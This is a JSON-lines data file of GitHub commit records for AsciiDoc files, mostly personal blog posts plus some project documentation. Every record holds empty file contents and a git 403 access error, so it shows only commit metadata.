{"commit":"1084461e9703124927dfb94efd06f6d348e56262","subject":"2016-07-07-LoveWar.adoc","message":"2016-07-07-LoveWar.adoc\n","repos":"Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io,Mr-IP-Kurtz\/mr-ip-kurtz.github.io","old_file":"_posts\/2016-07-07-LoveWar.adoc","new_file":"_posts\/2016-07-07-LoveWar.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Mr-IP-Kurtz\/mr-ip-kurtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5feeaaa219e3a268abb40214f3311436655d2117","subject":"Update 2017-07-04-Azure-5.adoc","message":"Update 2017-07-04-Azure-5.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-04-Azure-5.adoc","new_file":"_posts\/2017-07-04-Azure-5.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c95e9a9e45ff26d7b7df4c2a03be25ae70ce8b01","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee7d2bd21376eeb2d3bbe1671eb9d479e9919a24","subject":"Update 1993-12-12-goodgood-study.adoc","message":"Update 1993-12-12-goodgood-study.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/1993-12-12-goodgood-study.adoc","new_file":"_posts\/1993-12-12-goodgood-study.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c519b64ac2f34657dfdd1fe6c135f4e5044e412","subject":"Update 2018-10-28-Test-Maven-360.adoc","message":"Update 
2018-10-28-Test-Maven-360.adoc","repos":"tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io,tcollignon\/tcollignon.github.io","old_file":"_posts\/2018-10-28-Test-Maven-360.adoc","new_file":"_posts\/2018-10-28-Test-Maven-360.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tcollignon\/tcollignon.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"285b432dd3a0351d55202ac2d267bb892e5b3f84","subject":"Update 2016-10-06-Hello-world.adoc","message":"Update 2016-10-06-Hello-world.adoc","repos":"remi-hernandez\/remi-hernandez.github.io,remi-hernandez\/remi-hernandez.github.io","old_file":"_posts\/2016-10-06-Hello-world.adoc","new_file":"_posts\/2016-10-06-Hello-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/remi-hernandez\/remi-hernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03136448e5675cfa6e00f3ed35b34e63b4035655","subject":"Update 2017-02-07-how-to-waste-your-time-without-feeling-guilty.adoc","message":"Update 2017-02-07-how-to-waste-your-time-without-feeling-guilty.adoc","repos":"thaibeouu\/blog,thaibeouu\/blog,thaibeouu\/blog,thaibeouu\/blog","old_file":"_posts\/2017-02-07-how-to-waste-your-time-without-feeling-guilty.adoc","new_file":"_posts\/2017-02-07-how-to-waste-your-time-without-feeling-guilty.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thaibeouu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7230b695c2ba34828fd822ec7d8bd80e82cd54f","subject":"Add develop index to the documentation (#9666)","message":"Add develop index to the documentation (#9666)\n\n","repos":"decidim\/decidim,decidim\/decidim,decidim\/decidim","old_file":"docs\/modules\/develop\/pages\/index.adoc","new_file":"docs\/modules\/develop\/pages\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/decidim\/decidim.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"32949021415602cfd120d710af45107d1c5973e8","subject":"Update 2015-09-21-dogs_in_india.adoc","message":"Update 2015-09-21-dogs_in_india.adoc","repos":"stay-india\/stay-india.github.io,stay-india\/stay-india.github.io,stay-india\/stay-india.github.io","old_file":"_posts\/2015-09-21-dogs_in_india.adoc","new_file":"_posts\/2015-09-21-dogs_in_india.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/stay-india\/stay-india.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a3efa6e51c706788faf7e69b89119a314038a6f","subject":"add IN\/Clojure 2019, closes #314","message":"add IN\/Clojure 2019, closes #314\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2019\/inclojure.adoc","new_file":"content\/events\/2019\/inclojure.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"f9d84fc06d71cb58f0ed5eed7be644ea761e1b91","subject":"add deref","message":"add 
deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/08\/12\/deref.adoc","new_file":"content\/news\/2022\/08\/12\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"4db59a5823c47b75c2755fd8fad81c10bd55bf1d","subject":"initial README with local install command","message":"initial README with local install command\n","repos":"markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s,markfisher\/sk8s","old_file":"helm-charts\/README.adoc","new_file":"helm-charts\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/markfisher\/sk8s.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"70e0ace709fa6cd271830a12402ce6587ac4f6ce","subject":"Update deployment info","message":"Update deployment info\n","repos":"gentics\/mesh,gentics\/mesh,gentics\/mesh,gentics\/mesh","old_file":"doc\/src\/main\/docs\/deployment.asciidoc","new_file":"doc\/src\/main\/docs\/deployment.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gentics\/mesh.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"158acb13610c71445ba918172d82c69783a31258","subject":"Update 2018-06-11-Puppet-Anti-Patterns-Revisited.adoc","message":"Update 2018-06-11-Puppet-Anti-Patterns-Revisited.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2018-06-11-Puppet-Anti-Patterns-Revisited.adoc","new_file":"_posts\/2018-06-11-Puppet-Anti-Patterns-Revisited.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9bd8bc3c5a8b700b7e8dc63e6f832bca51f0fd12","subject":"Update 2015-03-02-Le-Cout-de-la-Vie.adoc","message":"Update 2015-03-02-Le-Cout-de-la-Vie.adoc","repos":"TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io,TeksInHelsinki\/TeksInHelsinki.github.io","old_file":"_posts\/2015-03-02-Le-Cout-de-la-Vie.adoc","new_file":"_posts\/2015-03-02-Le-Cout-de-la-Vie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TeksInHelsinki\/TeksInHelsinki.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33bb3a8d9b1b2a691e2dc73bd8de9f4d1b459bb5","subject":"y2b create post Motion Gaming: Who Cares? (Xbox One \\u0026 PS4)","message":"y2b create post Motion Gaming: Who Cares? 
(Xbox One \\u0026 PS4)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-06-17-Motion-Gaming-Who-Cares-Xbox-One-u0026-PS4.adoc","new_file":"_posts\/2013-06-17-Motion-Gaming-Who-Cares-Xbox-One-u0026-PS4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8affc227c520e0ac66641a8b7a7b4bfc73f0b7bd","subject":"Update 2016-04-12-Consultas.adoc","message":"Update 2016-04-12-Consultas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-12-Consultas.adoc","new_file":"_posts\/2016-04-12-Consultas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"447394f79154ec3709fe49d5a38200bf38018843","subject":"Added Industroyer IoCs","message":"Added Industroyer IoCs\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"industroyer\/README.adoc","new_file":"industroyer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"a2fcd5d0b4db0231cbfb6eacf44aa989de010a27","subject":"y2b create post Just Touch It?","message":"y2b create post Just Touch It?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-06-01-Just-Touch-It.adoc","new_file":"_posts\/2016-06-01-Just-Touch-It.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"de1bedd8b7d19b25518d5a39728232c925b05494","subject":"Update 2018-12-05-vr-programing.adoc","message":"Update 2018-12-05-vr-programing.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-05-vr-programing.adoc","new_file":"_posts\/2018-12-05-vr-programing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2c9d5afd51d0f5c39e2d76380c5790df99943ab","subject":"Esc further url","message":"Esc further url\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Automated Eclipse install.adoc","new_file":"Dev tools\/Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b992383971da22cbd38136657325bd62b07395b4","subject":"Update 2017-02-09-test1.adoc","message":"Update 
2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f47adc7545e313fff6b653f25a2cac076d11a54","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f0c058214853d42ecae54205635358fb679084a","subject":"Update 2016-03-29-Conocido-Desconocido.adoc","message":"Update 2016-03-29-Conocido-Desconocido.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_file":"_posts\/2016-03-29-Conocido-Desconocido.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fd272657d435624cad70de9431585d8870e44a18","subject":"Update 2016-06-19-My-thoughts-on-OCREC.adoc","message":"Update 2016-06-19-My-thoughts-on-OCREC.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2016-06-19-My-thoughts-on-OCREC.adoc","new_file":"_posts\/2016-06-19-My-thoughts-on-OCREC.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fad60b491fa2b336c213ea73db9c29c48050fb5","subject":"Update 2018-01-30-a-late-night-thought.adoc","message":"Update 2018-01-30-a-late-night-thought.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2018-01-30-a-late-night-thought.adoc","new_file":"_posts\/2018-01-30-a-late-night-thought.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64b2670000da8227b067975e98099fdd9ac6f13f","subject":"Update 2018-02-23-make-book-manage-App.adoc","message":"Update 
2018-02-23-make-book-manage-App.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_file":"_posts\/2018-02-23-make-book-manage-App.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"570c24cb6973bcf712fddc3758be52bf8310464b","subject":"job: #11981 introducing implementation note for requirements tag export","message":"job: #11981 introducing implementation note for requirements tag export\n","repos":"xtuml\/mc,rmulvey\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,rmulvey\/mc,leviathan747\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,lwriemen\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,lwriemen\/mc,cortlandstarrett\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,leviathan747\/mc,leviathan747\/mc,lwriemen\/mc,cortlandstarrett\/mc","old_file":"doc\/notes\/11444_wasl\/11981_reqs_int.adoc","new_file":"doc\/notes\/11444_wasl\/11981_reqs_int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"eaf87299417849e05786e2b865c54fc79e6fbb0f","subject":"Fixes RC1\/RC2 URLs","message":"Fixes RC1\/RC2 URLs\n\nFixes gh-3838\n","repos":"jgrandja\/spring-security,wkorando\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,SanjayUser\/SpringSecurityPro,ollie314\/spring-security,wkorando\/spring-security,djechelon\/spring-security,kazuki43zoo\/spring-security,mdeinum\/spring-security,fhanik\/spring-security,thomasdarimont\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,olezhuravlev\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,pwheel\/spring-security,rwinch\/spring-security,jgrandja\/spring-security,wkorando\/spring-security,mdeinum\/spring-security,pwheel\/spring-security,olezhuravlev\/spring-security,fhanik\/spring-security,pwheel\/spring-security,djechelon\/spring-security,SanjayUser\/SpringSecurityPro,fhanik\/spring-security,kazuki43zoo\/spring-security,pwheel\/spring-security,djechelon\/spring-security,eddumelendez\/spring-security,rwinch\/spring-security,ollie314\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,olezhuravlev\/spring-security,jgrandja\/spring-security,olezhuravlev\/spring-security,eddumelendez\/spring-security,wkorando\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,jgrandja\/spring-security,thomasdarimont\/spring-security,thomasdarimont\/spring-security,SanjayUser\/SpringSecurityPro,rwinch\/spring-security,ollie314\/spring-security,thomasdarimont\/spring-security,mdeinum\/spring-security,eddumelendez\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,djechelon\/spring-security,fhanik\/spring-security,rwinch\/spring-security,SanjayUser\/SpringSecurityPro,spring-projects\/spring-security,rw
inch\/spring-security,SanjayUser\/SpringSecurityPro,jgrandja\/spring-security,pwheel\/spring-security,olezhuravlev\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fhanik\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"482cdff4165cce1b25562f7797a441c7bc03da09","subject":"Update 2016-06-08-eduard-hola-mundo.adoc","message":"Update 2016-06-08-eduard-hola-mundo.adoc","repos":"eduardo76609\/eduardo76609.github.io,eduardo76609\/eduardo76609.github.io,eduardo76609\/eduardo76609.github.io,eduardo76609\/eduardo76609.github.io","old_file":"_posts\/2016-06-08-eduard-hola-mundo.adoc","new_file":"_posts\/2016-06-08-eduard-hola-mundo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eduardo76609\/eduardo76609.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a830157d3359d156aa9c47cb1a798bccef4378e1","subject":"example: finding last commit dates for all files","message":"example: finding last commit dates for all files\n","repos":"virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin,virgo47\/litterbin","old_file":"notes\/HandyCommandsProjectReview.adoc","new_file":"notes\/HandyCommandsProjectReview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/virgo47\/litterbin.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"80e16187f3ad35265399b418d3bd5e18fcbf736a","subject":"Update documentation","message":"Update documentation\n","repos":"chirino\/docker-maven-plugin,fabric8io\/docker-maven-plugin,vjuranek\/docker-maven-plugin,jgangemi\/docker-maven-plugin,rhuss\/docker-maven-plugin,thomasvandoren\/docker-maven-plugin,vjuranek\/docker-maven-plugin,rhuss\/docker-maven-plugin,fabric8io\/docker-maven-plugin,scoplin\/docker-maven-plugin,vjuranek\/docker-maven-plugin,mattbetzel\/docker-maven-plugin,fabric8io\/docker-maven-plugin","old_file":"src\/main\/asciidoc\/inc\/_goals.adoc","new_file":"src\/main\/asciidoc\/inc\/_goals.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mattbetzel\/docker-maven-plugin.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89dfaeb44cecd9264a177dbb4d67a9cd878bc90f","subject":"update project","message":"update project\n","repos":"fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss,fmarchioni\/mastertheboss","old_file":"jax-rs\/resteasy-client\/readme.adoc","new_file":"jax-rs\/resteasy-client\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fmarchioni\/mastertheboss.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1439ac72c38bdf1b5ca62e8c1353ab17561a1420","subject":"Update 2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","message":"Update 
2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","repos":"blater\/blater.github.io,blater\/blater.github.io,blater\/blater.github.io","old_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_file":"_posts\/2015-09-10-Centos-7-developer-workstation-on-VirtualBox-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blater\/blater.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09c2d699986985d400186667435b6d75b2e38c55","subject":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","message":"Update 2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_file":"_posts\/2018-07-30-Publishing-tens-of-millions-of-messages-per-second.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"36d05f2fd6c94439b07224c7f32314de1cfdfd2f","subject":"Update 2017-10-10-Your-Blog-title.adoc","message":"Update 2017-10-10-Your-Blog-title.adoc","repos":"Zatttch\/zatttch.github.io,Zatttch\/zatttch.github.io,Zatttch\/zatttch.github.io,Zatttch\/zatttch.github.io","old_file":"_posts\/2017-10-10-Your-Blog-title.adoc","new_file":"_posts\/2017-10-10-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Zatttch\/zatttch.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"df6cf9b840568ff595b14b04b07acc18c7228a20","subject":"Update 2019-01-31-Your-Blog-title.adoc","message":"Update 2019-01-31-Your-Blog-title.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_file":"_posts\/2019-01-31-Your-Blog-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f57e5150ca76cc1ece763800767fa193a99767d","subject":"Phrasing and ref FSP","message":"Phrasing and ref FSP\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Best practices\/Various.adoc","new_file":"Best practices\/Various.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1586158eb5f4292299fe22009cfb3673b69025fb","subject":"Update 2018-05-19-Go-O-R-Join.adoc","message":"Update 2018-05-19-Go-O-R-Join.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_file":"_posts\/2018-05-19-Go-O-R-Join.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"853e036906067073dfbe5c9b93af9aedd89d20e5","subject":"Update 2017-01-19-Swift-Web-View.adoc","message":"Update 2017-01-19-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_file":"_posts\/2017-01-19-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13a4e1eb6777613286381d8f5f38509f0eb95fd5","subject":"Initial commit of my Go notes","message":"Initial commit of my Go notes\n","repos":"0xMF\/toybox","old_file":"content\/post\/golang.asciidoc","new_file":"content\/post\/golang.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"9da8bafeb6d857ef12fd2ed54402dccd53ec2a2f","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f80d7008b0390b102b8fa2accc6bdc1a0877ed75","subject":"Administrator can lookup all existing service monitors and their configuration parameters","message":"Administrator can lookup all existing service monitors and their configuration parameters\n\n- NMS-6634: Create documentation for DNSResolutionMonitor\n","repos":"tdefilip\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/DNSResolutionMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/DNSResolutionMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aihua\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} 
